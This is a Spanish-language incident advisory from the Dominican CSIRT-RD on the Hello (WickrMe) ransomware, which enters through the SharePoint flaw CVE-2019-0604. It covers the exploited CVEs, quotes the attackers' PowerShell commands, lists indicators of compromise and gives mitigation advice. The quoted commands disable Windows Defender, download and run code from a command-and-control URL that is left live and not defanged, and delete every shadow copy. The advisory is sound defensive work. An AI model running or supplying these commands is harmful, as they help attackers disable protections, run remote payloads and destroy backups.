Análisis De Caso: Ransomware Hello (Wickrme)

Introducción

El equipo El Equipo Nacional de Repuestas a Incidentes Cibernéticos (CSIRT-RD) ha detectado múltiples casos de explotación activa sobre una vulnerabilidad de ejecución remota de código (RCE) presente en Microsoft SharePoint (CVE-2019-0604). La misma está siendo utilizada por atacantes para entrar en la red de los sistemas afectados y lanzar ataques de rasomware.

El CSIRT-RD emite esta alerta para asegurarse de que los propietarios del sistema estén al tanto de esta vulnerabilidad y puedan tomar las acciones de remediación.

Ransomware Hello (Wickrme)

En el mundo de la ciberseguridad, una de las ciber amenazas actuales más peligrosas a nivel mundial y que sigue en aumento día a día es el ransomware, ya que un ataque exitoso de este tipo podría tener múltiples impactos sobre una organización, desde el daño reputacional y la exposición de información estratégica confidencial, hasta la interrupción completa del negocio.

El ransomware Hello, también conocido como ransomware WickrMe fue identificado por primera vez en agosto de 2020 y se han observado nuevas variantes a partir de enero 2021. El mismo utiliza un tipo de cifrado de alto nivel para cifrar los datos y cambia los archivos de la víctima con la extensión .hello, .strike y .hemming. El virus crea un archivo Readme!!!.txt que contiene la instrucción de rescate sobre cómo o dónde pueden enviar mensajes o correos electrónicos a los actores de la amenaza para realizar el pago de rescate.

Para obtener instrucciones sobre cómo pagar por una clave de descifrado y software, las víctimas son instruidas a ponerse en contacto con los desarrolladores de ransomware a través de correos electrónicos SheilaBeasley@tutanota.com, CarolynDixon@tunota.com. Sin embargo, es importante mencionar que pagar un rescate a los desarrolladores de ransomware no garantiza que enviarán una herramienta de descifrado. Actualmente no existen herramientas de terceros que puedan descifrar archivos cifrados por Hello (WickrMe) y la única forma de recuperar archivos sin pagar un rescate es restaurarlos desde una copia de seguridad.

Vector de Entrada

El principal vector de entrada del ransomware WICKRME es su distribución aprovechando una vulnerabilidad en los servidores de Microsoft SharePoint. La vulnerabilidad permite que un atacante cargue un paquete de aplicación de SharePoint especialmente diseñado para escalar privilegios y ejecutar código arbitrario. Esta afecta a las versiones:

• Microsoft SharePoint Server 2019
• Microsoft SharePoint Server 2013 Service Pack 1
• Microsoft SharePoint Server 2010 Service Pack 2
• Microsoft SharePoint Foundation 2013 Service Pack 1
• Microsoft SharePoint Foundation 2010 Service Pack 2
• Microsoft SharePoint Enterprise Server 2016

La vulnerabilidad conocida con el identificador CVE-2019-0604 fue publicada a inicios de 2019 y se lazaron los parches de actualización el 12 de febrero del mismo año para solventar esta vulnerabilidad .

Aunque este es el principal vector de entrada de este ransomware, es importante señalar que en los últimos tiempos se han revelado varias vulnerabilidades de carácter críticas que han afectado a los principales proveedores de seguridad y software utilizado en las organizaciones. En este sentido se listan las vulnerabilidades que han sido explotadas en ataques de esta variante de ransomware:

• CVE-2019-0708-BlueKeep (RDP)
• CVE-2020-0610-BlueGate (RDP)
• CVE-2019-2725-Oracle Web Logic Server
• CVE-2019-11510-Pulse Secure VPN
• CVE-2020-5902-F5 BIG-IP TMUI
• CVE-2019-1579-Palo Alto GlobalProtect SSL VPN
• CVE-2018-13379-Fortinet FortiOS
• CVE-2019-19781-Citrix ADC / Citrix Gateway
• CVE-2020-1472-Zerologon (Active Directory Netlogon)
• CVE-2021-26858 proxyLogon:Microsoft Exchange Server

Al atacante explotar la vulnerabilidad y comprometer un usuario con altos nivel de privilegio, le permite moverse lateralmente dentro la red y ejecutar comandos por PowerShell con permisos de administrador soliendo utilizar Cobalt Strike como una forma de ejecutar scripts de automatizados. De acuerdo con las investigaciones realizadas por Equipo Nacional de Respuestas incidentes Cibernéticos CSIRT-RD se ha identificado que la primera acción a nivel de PowerShell por parte del atacante es deshabilitar las funciones de seguridad y monitoreo en tiempo real de los mecanismos de seguridad de Windows, como lo es Windows Defender abusando del comando Set-MPPreference, para este se vale del del siguiente comando:

powershell -c Set-MpPreference -PUAProtection disable;Set-MpPreference -DisableRealtimeMonitoring $true;Set-MpPreference -DisableBehaviorMonitoring $true

Una vez deshabilitadas funciones de seguridad de Windows el atacante ejecuta comandos para crear un proceso ilegitimo utilizando funciones para ocultarse y descargar un archivo malicioso desde el centro comando y control. El CSIRT-RD ha identificado servidores comprometidos que crean un servicio ilegitimo oculto en segundo plano con el nombre de ofuscación “Kaspersky” utilizando el siguiente comando en PowerShell:

powershell -nop -w hidden set-alias -name kaspersky -value Invoke-Expression;kaspersky(New-Object Net.WebClient).DownloadString('https://microin.dnsrd.com/css/cps.css'

El comando descarga la carga útil a través de un script que se encuentra codificado y ofuscado desde la página ‘https[:]//microin[.]dnsrd[.]com/css/cps[.]css’, utilizando la función Invoke-Expression.

Luego de ejecutar el anterior comando, utilizan el comando:

c:\windows\syswow64\windowspowershell\v1.0\powershell.exe -Version 4.0 -s -NoLogo -NoProfile)

el cual invoca la consola de Powershell utilizando una versión antigua, versión v1.0 pero con características de una versión avanzada, versión 4.0 de PowerShell.

Al ejecutar este comando es posible utilizar las características avanzadas de NoProfile y NoLogo que pertenecen a la versión 4.0 pero no se encuentran en la 1.0. Con esta acción y con el uso de componentes avanzados, el atacante se asegura de tener una consola abierta, oculta y ejecutar comandos de forma anónima.

Siguiendo las acciones realizas por el atacante y de acuerdo con las investigaciones realizadas por el CSIRT-RD, se observó que el atacante tomas las acciones de eliminar las Shadows Copies, servicio que permite crear copias de seguridad de los archivos en la máquina de usuario, pudiendo volver a un punto de anterior o hacer una restauración del sistema. Para valerse de esta acción el atacante utiliza el siguiente comando en PowerShell:

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe vssadmin.exe delete shadows /all

Este comando ejecuta la utilidad vssadmin.exe y elimina todas las instantáneas de volumen en la computadora asegurándose de esta manera de inhibir la restauración de archivos eliminando unidades de respaldo e instantáneas del sistema.

MITRE ATT&CK Framework

Indicadores De Compromiso Asociados

Correos electrónicos

• asauribe@tutanota.com
• candietodd@tutanota.com
• kellyreiff@tutanota.com
• kevindeloach@protonmail.com
• sheilabeasley@tutanota.com

Direcciones IP

• 185.250.151.119
• 107.175.49.49

URL

• hxxps[:]//micron[.]xxuz[.]com/css/fps.css
• hxxp[:]//138[.]124[.]180[.]182/css/fpi.css
• hxxps[:]//microsofts[.]dnsrd[.]com/css/home.css
• hxxps[:]//vlad-cdn[.]com/console/login.php

HASHES

• 5deb5eae1af5602c6b8d8c00b2249d67da663bfc32df692a9575c4b65f7276bb
• c8fd6d5f5e76b96520d47a542791a634cdbbf96fc8cc55f956309b16e5985c4e
• 854b56231c1b73a2fd704945b80c9dc036cb1ad4a6897514ba26bd4a2802b95a
• 2e610b407b6477cde10af9bcd5c24242e31f6acb36df87d0d7b9df27c29c3ebb
• 3bdbfe712926452c4dab3adbb6fdb3f65955ceabd7e3351d83840e6f83e72788
• 253939be5c1db119f84a6c55e39765baf95d75d98355c5ecd71828d90e3c84dc
• 45793b947e2c8c09742ba5d85b544471d9e5ccedd395dc3ee7faaa9c83dc65b6

Como Protegerte

• Se recomienda parchar y mantener actualizado el software y el sistema operativo a las últimas versiones disponibles por parte del fabricante, por lo general los atacantes toman como vector de entrada sistemas desactualizados u obsoletos como lo es el caso de Microsoft Sharepoint.
• Siempre haga una copia de seguridad de los archivos y guárdelos en un servidor remoto o en un dispositivo de almacenamiento desconectado (o en ambos). Es recomendable mantener las copias de seguridad de los datos encriptadas. Los procedimientos de respaldo deben realizarse y ser probados con regularidad bajo una estrategia de mejora continua.
• No haga una copia de seguridad de los archivos en el mismo disco duro en el que está instalado Windows. Por ejemplo, no realice copias de seguridad de archivos en una partición de recuperación.
• Guarde siempre los medios utilizados para las copias de seguridad (discos duros externos, DVD o CD) en un lugar seguro para evitar que personas no autorizadas tengan acceso a sus archivos.
• No se deben abrir archivos adjuntos y / o enlaces en correos electrónicos irrelevantes que se recibieron de direcciones desconocidas o sospechosas.
• El sistema operativo, el software y el antivirus deben actualizarse con frecuencia desde el sitio web oficial.
• Brinde capacitación sobre concienciación sobre seguridad a todos los empleados y usuarios finales sobre cómo identificar correos electrónicos de phishing.
• Crear, mantener y poner en práctica un plan de respuesta a incidentes cibernéticos y un plan de comunicaciones asociado, que incluya procedimientos de respuesta y notificación para un incidente de ransomware.
• Realizar análisis de vulnerabilidades continuos para identificar y abordar posibles vectores de acceso especialmente en los equipos expuesto a Internet y limitar así la superficie del ataque.
• Se recomienda implementar 2FA o MFA para los servicios utilizados en, particularmente para correo web, VPN y cuentas que acceden a sistemas críticos de la organización.
• Emplee medios segmentación en la red para separar diversas unidades de negocio o departamentos críticos dentro de su organización.

Descargar Alerta En Formato PDF